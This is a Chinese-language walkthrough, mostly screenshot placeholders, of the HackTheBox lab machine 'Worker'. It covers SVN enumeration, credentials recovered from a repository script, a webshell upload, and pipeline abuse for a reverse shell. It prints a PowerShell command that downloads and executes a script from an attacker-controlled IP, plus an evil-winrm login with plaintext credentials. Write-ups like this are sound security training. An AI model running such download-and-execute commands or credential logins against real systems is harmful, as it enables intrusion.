Worker - HackTheBox
Td

image

nmap扫描

image

image

访问80端口

image

iis起始页,3690端口svnserve服务没见过,搜一下

https://book.hacktricks.xyz/network-services-pentesting/3690-pentesting-subversion-svn-server

image

image

目录下有东西

image

获得了一个域名

image

又一个域名,添加hosts文件

image

要登录

另一个域名

image

image

这里又获得一大堆域名,都添加到hosts文件

image

这些页面都没什么利用信息,继续看3690端口

image

这里还有一关ps1文件

image

获得了账号密码,去登录

image

image

这里貌似可以上传webshell

image

并没有权限

image

直接新建一个

image

上是上传了,但路径是哪里

image

然后我发现了这里,这个地方应该就是对应着那些子域名

image

去访问看看

image

貌似不行

image

要发布后,才访问成功

image

获取webshell

powershell -c "iex (new-object system.net.webclient).downloadstring('http://10.10.14.17/test.ps1')"

image

提权

image

windows server 2019 64位系统

image

检测工具也是什么也没检测到

image

尝试PrintSpoofer提权

msf生成一个反弹shell

image

但是并没有什么用

在users目录下发现robislrestorer两个用户,并且都可以进行远程登录

image

image

开放了445,但并没有扫描到

image

还有一个W:磁盘

image

image

发现一个passwd文件

image

这应该是明文账号密码了

尝试登录

evil-winrm -i 10.10.10.203 -u robisl -p wolves11

image

但是这样还是提不了权

继续返回80,尝试用robisl用户登录

image

image

貌似这个用户可以用administrator的权限执行一些管道命令

image

修改script部分和pool内容,让其反弹一个shell

image

image